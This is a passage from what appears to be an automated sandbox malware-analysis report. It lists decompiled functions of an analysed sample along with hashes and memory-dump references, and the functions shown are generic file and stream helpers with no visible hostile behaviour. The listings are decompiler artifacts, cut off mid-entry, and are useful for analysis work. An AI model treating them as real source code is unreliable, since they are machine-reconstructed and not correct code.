                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 014e632aeb298c7c5fa2711748417e450852bd954b1a1f8b84fdb106b4d8a7e9
                                                                                                                    • Instruction ID: aa6ed5130d82d2080db3fde0f212b6a492a80969088409440143dbf4c2e634a5
                                                                                                                    • Opcode Fuzzy Hash: 014e632aeb298c7c5fa2711748417e450852bd954b1a1f8b84fdb106b4d8a7e9
                                                                                                                    • Instruction Fuzzy Hash: 26E0E575640208FBCF11CFA5C801B8E7BF9EB09754F20C169F919AA2A0D7399A50DF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B54CE2 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 77%
                                                                                                                    			E00B54CE2(void* __ebx, signed int __ecx) {
				void* _t13;
				void* _t25;

				L00B7F140(0xb87237, _t25);
				_push(__ecx);
				 *((intOrPtr*)(_t25 - 0x10)) = __ecx;
				 *(_t25 - 4) = 1;
				L00B5506A(__ecx + 0x74); // executed
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				L00B5502E(__ebx, __ecx + 0x68);
				asm("sbb ecx, ecx");
				_t13 = L00B4D432( ~(__ecx - 4) & __ecx);
				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
				return _t13;
			}





                                                                                                                    0x00b54ce7
                                                                                                                    0x00b54cec
                                                                                                                    0x00b54cf0
                                                                                                                    0x00b54cf6
                                                                                                                    0x00b54cfd
                                                                                                                    0x00b54d02
                                                                                                                    0x00b54d09
                                                                                                                    0x00b54d13
                                                                                                                    0x00b54d17
                                                                                                                    0x00b54d20
                                                                                                                    0x00b54d28

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B54CE7
                                                                                                                      • Part of subcall function 00B5506A: __EH_prolog.LIBCMT ref: 00B5506F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 5aad2fd290dbd9d2e9b54d06fb2d4ad170aa832602381e3a735a3fbe7880c7fa
                                                                                                                    • Instruction ID: 9ad0f0eed3c4bb1b8b7e5987d136898878cae3850a4bff3f9cbc4a23444e24dc
                                                                                                                    • Opcode Fuzzy Hash: 5aad2fd290dbd9d2e9b54d06fb2d4ad170aa832602381e3a735a3fbe7880c7fa
                                                                                                                    • Instruction Fuzzy Hash: A2E09A72A50920CACB1DEF64C4627EDB7E4EF00704F0406DDA443A2A81CFB46B08CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B57D91 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00B57D91(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t24;
				void* _t26;

				L00B7F140(0xb87598, _t26);
				_push(__ecx);
				_t24 = __ecx;
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				E00B51B99(__ecx, __edx, __eflags); // executed
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				L00B57DE0(__ecx + 0x80);
				 *(__ecx + 0x8c) =  *(__ecx + 0x8c) & 0x00000000;
				 *(__ecx + 0x8d) =  *(__ecx + 0x8d) & 0x00000000;
				E00B5A4D7(__ecx,  *(__ecx + 0x8d));
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t24;
			}





                                                                                                                    0x00b57d96
                                                                                                                    0x00b57d9b
                                                                                                                    0x00b57d9d
                                                                                                                    0x00b57d9f
                                                                                                                    0x00b57da2
                                                                                                                    0x00b57da7
                                                                                                                    0x00b57db1
                                                                                                                    0x00b57db6
                                                                                                                    0x00b57dbd
                                                                                                                    0x00b57dcc
                                                                                                                    0x00b57dd7
                                                                                                                    0x00b57ddf

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B57D96
                                                                                                                      • Part of subcall function 00B51B99: __EH_prolog.LIBCMT ref: 00B51B9E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 446bc9539a26d089ef9c97533375259f1b8f36465dd1b7eb1eadb9656069368b
                                                                                                                    • Instruction ID: bf34faaecc95989a41fc9dc46761a77e2c7fea575b597d0156d3fc921a79d0b1
                                                                                                                    • Opcode Fuzzy Hash: 446bc9539a26d089ef9c97533375259f1b8f36465dd1b7eb1eadb9656069368b
                                                                                                                    • Instruction Fuzzy Hash: 5FE092B1A24A608BD315EB64C4017EDB7E4BF04306F0089EEE896D3281CFF46908CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1224A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B1224A(struct _IO_FILE** __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v36;
				struct _IO_FILE** _t13;

				_t13 = __ecx;
				L00B11944( &_v36, _a4, _a8);
				fputs( &_v36,  *__ecx); // executed
				return _t13;
			}





                                                                                                                    0x00b12251
                                                                                                                    0x00b1225c
                                                                                                                    0x00b12267
                                                                                                                    0x00b12273

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1795875747-0
                                                                                                                    • Opcode ID: 3922f2463fcf10037560891522c5b43f7d9aa82ad10dd538f576dfcf9be80895
                                                                                                                    • Instruction ID: a23b6df3edce2c4e338b6f4be1402026e721d9ec90016de210cd4eb0145eed31
                                                                                                                    • Opcode Fuzzy Hash: 3922f2463fcf10037560891522c5b43f7d9aa82ad10dd538f576dfcf9be80895
                                                                                                                    • Instruction Fuzzy Hash: E2D01232504119ABCF146B98DC49CED77ACEB08258704441AF951B2190EA75E515C794
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4E539 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E00B4E539(intOrPtr __ecx) {
				void* _t8;
				void* _t17;
				intOrPtr _t19;

				L00B7F140(E00B86B10, _t17);
				_push(__ecx);
				_push(__ecx);
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
				 *((intOrPtr*)(_t17 - 0x14)) = __ecx;
				_t8 = E00B4E578(__ecx, 0); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t8;
			}






                                                                                                                    0x00b4e53e
                                                                                                                    0x00b4e543
                                                                                                                    0x00b4e544
                                                                                                                    0x00b4e545
                                                                                                                    0x00b4e54c
                                                                                                                    0x00b4e551
                                                                                                                    0x00b4e554
                                                                                                                    0x00b4e55e
                                                                                                                    0x00b4e567

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4E53E
                                                                                                                      • Part of subcall function 00B4E578: __EH_prolog.LIBCMT ref: 00B4E57D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: c9768a37f28b06dc6d9d9fec2114df0f97f1acc1dc20e7d6274ac550298f8ea5
                                                                                                                    • Instruction ID: 01d641d149c959fb23b6f386314213bf5aec5fad5a0952009b09a38f9ac90cb3
                                                                                                                    • Opcode Fuzzy Hash: c9768a37f28b06dc6d9d9fec2114df0f97f1acc1dc20e7d6274ac550298f8ea5
                                                                                                                    • Instruction Fuzzy Hash: 2BD05B72E10214FBE7149B45D803BEFB7B8FB41758F10456EF011B1140D7B59A008764
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1786E Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00B1786E(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                                                                                                    0x00b17871
                                                                                                                    0x00b17878
                                                                                                                    0x00b17884
                                                                                                                    0x00b17892
                                                                                                                    0x00b17898

                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,00B1757E,00000000,00004000,00000000,00000002,?,?,?), ref: 00B17884
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 71d830d1c76b5c122c31328229d86c18d356ce04ba5d8a42be831d85ec1addf4
                                                                                                                    • Instruction ID: 0096d00f18a4269170d655d7830c8e8e4339a08d8e660bb23444200992a03fe3
                                                                                                                    • Opcode Fuzzy Hash: 71d830d1c76b5c122c31328229d86c18d356ce04ba5d8a42be831d85ec1addf4
                                                                                                                    • Instruction Fuzzy Hash: 10E0EC75200209FBDF01CF90CD45F8E7BB9AB49754F208058E905A61A0D776AA14EB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B22AFD Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B22AFD(void** __ecx) {
				void* _t3;
				signed int _t4;
				signed int _t5;
				signed int* _t8;

				_t8 = __ecx;
				_t3 =  *__ecx;
				if(_t3 != 0) {
					_t4 = FindCloseChangeNotification(_t3); // executed
					_t5 = _t4 & 0xffffff00 | _t4 != 0x00000000;
					if(_t5 != 0) {
						 *_t8 =  *_t8 & 0x00000000;
						return _t5;
					}
					return _t5;
				} else {
					return 1;
				}
			}







                                                                                                                    0x00b22afe
                                                                                                                    0x00b22b00
                                                                                                                    0x00b22b04
                                                                                                                    0x00b22b0b
                                                                                                                    0x00b22b13
                                                                                                                    0x00b22b18
                                                                                                                    0x00b22b1a
                                                                                                                    0x00000000
                                                                                                                    0x00b22b1a
                                                                                                                    0x00b22b1e
                                                                                                                    0x00b22b06
                                                                                                                    0x00b22b09
                                                                                                                    0x00b22b09

                                                                                                                    APIs
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00B22A86,?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22B0B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2591292051-0
                                                                                                                    • Opcode ID: 379684b0b97399f36260546eac65fe80882ebb9c10bedbb6cb00e7fac4e80883
                                                                                                                    • Instruction ID: 8b968187e5f355e687acdfbd4eb11ed7a329b396c8a468ead783f79629dd8702
                                                                                                                    • Opcode Fuzzy Hash: 379684b0b97399f36260546eac65fe80882ebb9c10bedbb6cb00e7fac4e80883
                                                                                                                    • Instruction Fuzzy Hash: 74D0123161422257DF705F2CB888BD123DD9F11362F1A44DAF894CB150EB64DCC3AA54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1736B Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B1736B(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                                                    0x00b1736c
                                                                                                                    0x00b1736e
                                                                                                                    0x00b17373
                                                                                                                    0x00b17387
                                                                                                                    0x00b1738a
                                                                                                                    0x00b17375
                                                                                                                    0x00b17376
                                                                                                                    0x00b1737e
                                                                                                                    0x00b17384
                                                                                                                    0x00000000
                                                                                                                    0x00b17380
                                                                                                                    0x00b17383
                                                                                                                    0x00b17383
                                                                                                                    0x00b1737e

                                                                                                                    APIs
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,00B172CE,00000002,?,00000000,00000000), ref: 00B17376
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2591292051-0
                                                                                                                    • Opcode ID: 7048b968ef349ea5ec3ee19e1b66e502da88d5b351ac1d75e1d3095a44df496b
                                                                                                                    • Instruction ID: 4ebf82b48fad6ec8906061e8c77d62f66a22e130e3fb4cb4a7c693998b14e5df
                                                                                                                    • Opcode Fuzzy Hash: 7048b968ef349ea5ec3ee19e1b66e502da88d5b351ac1d75e1d3095a44df496b
                                                                                                                    • Instruction Fuzzy Hash: C5D0C931148162468B641E6C78849D133E99A023303750BC9F8B5C31E0DA708CC7A654
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B16581 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B16581(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                                                    0x00b16582
                                                                                                                    0x00b16584
                                                                                                                    0x00b16589
                                                                                                                    0x00b1659d
                                                                                                                    0x00b165a0
                                                                                                                    0x00b1658b
                                                                                                                    0x00b1658c
                                                                                                                    0x00b16594
                                                                                                                    0x00b1659a
                                                                                                                    0x00000000
                                                                                                                    0x00b16596
                                                                                                                    0x00b16599
                                                                                                                    0x00b16599
                                                                                                                    0x00b16594

                                                                                                                    APIs
                                                                                                                    • FindClose.KERNELBASE(00000000,?,00B165B9), ref: 00B1658C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1863332320-0
                                                                                                                    • Opcode ID: 135a6d3614edc8ff86e12407a479764376700640f542a304a35fc85a9389f07b
                                                                                                                    • Instruction ID: b825b68e900ed4501223985882c9eedd1518b1e8575f74d284379bb35825ec5e
                                                                                                                    • Opcode Fuzzy Hash: 135a6d3614edc8ff86e12407a479764376700640f542a304a35fc85a9389f07b
                                                                                                                    • Instruction Fuzzy Hash: F0D01231114622568E642E3D7C489D237D99A163343650789F4B4D31E8D7609CC35650
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B12059 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B12059(struct _IO_FILE** __ecx, intOrPtr _a4, char** _a8) {
				int _t4;
				char** _t8;

				_t8 = _a8;
				E00B1207C(__ecx, _a4, _t8);
				_t4 = fputs( *_t8,  *__ecx); // executed
				return _t4;
			}





                                                                                                                    0x00b1205b
                                                                                                                    0x00b12066
                                                                                                                    0x00b1206f
                                                                                                                    0x00b12079

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1795875747-0
                                                                                                                    • Opcode ID: 9ac641d1a5cf9c40bffb03604dde44877d245b1f428186870446607753649272
                                                                                                                    • Instruction ID: 008cda0e04a194bcd95935766198e0a9bf958c8705a4220b232cf485902aceaf
                                                                                                                    • Opcode Fuzzy Hash: 9ac641d1a5cf9c40bffb03604dde44877d245b1f428186870446607753649272
                                                                                                                    • Instruction Fuzzy Hash: 45D0C93600C251AF97656F15EC0DC8BBFA5FFD9720725082FF480521B09B626865DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B11FE9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B11FE9(struct _IO_FILE** __ecx) {
				struct _IO_FILE** _t6;

				_t6 = __ecx;
				fputc(0xa,  *__ecx); // executed
				return _t6;
			}




                                                                                                                    0x00b11fea
                                                                                                                    0x00b11ff0
                                                                                                                    0x00b11ffb

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1992160199-0
                                                                                                                    • Opcode ID: a48ae33343018192c7a37e62e14457b4f34c4a49577a595c4f707202c326ec7d
                                                                                                                    • Instruction ID: 31231fbbd0f47c148cac1a7332a2c434543a4059a2187a8202febbf70985372c
                                                                                                                    • Opcode Fuzzy Hash: a48ae33343018192c7a37e62e14457b4f34c4a49577a595c4f707202c326ec7d
                                                                                                                    • Instruction Fuzzy Hash: 7BB0923230C220ABEA182A98BC0EAD06794DB09B32B25009BF944D21A09E911C818B95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1795A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00B1795A(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                                                                                                                    0x00b17968
                                                                                                                    0x00b17970
                                                                                                                    0x00b17974

                                                                                                                    APIs
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?,00B17984,00000000,00000000,?,00B1E554,?,?,?,?), ref: 00B17968
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1425588814-0
                                                                                                                    • Opcode ID: 6813a9aeb61be4a16a76937223ad630517760e7f26f1e82ef6149510bd79914e
                                                                                                                    • Instruction ID: 117653115759b7b3638158319d5e1480a91522c2e78757566664033a8149520b
                                                                                                                    • Opcode Fuzzy Hash: 6813a9aeb61be4a16a76937223ad630517760e7f26f1e82ef6149510bd79914e
                                                                                                                    • Instruction Fuzzy Hash: B6C04C36158116FF8F020F70CC05C1ABBA2AB99311F10C918B255C50B0DB328024EB12
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B17A5B Relevance: 1.5, APIs: 1, Instructions: 6fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00B17A5B(void** __ecx) {
				signed int _t1;

				_t1 = SetEndOfFile( *__ecx); // executed
				asm("sbb eax, eax");
				return  ~( ~_t1);
			}




                                                                                                                    0x00b17a5d
                                                                                                                    0x00b17a65
                                                                                                                    0x00b17a69

                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,00B17AA0,?,?,?), ref: 00B17A5D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    • Opcode ID: d55e3e6c8075d2b055aed202a41bfd3888520a218a5eb8808ca88926c2b605c3
                                                                                                                    • Instruction ID: 82b60df86e37eb1b38e871133f788910c2922e93edc5394da81b9f5d56f063fa
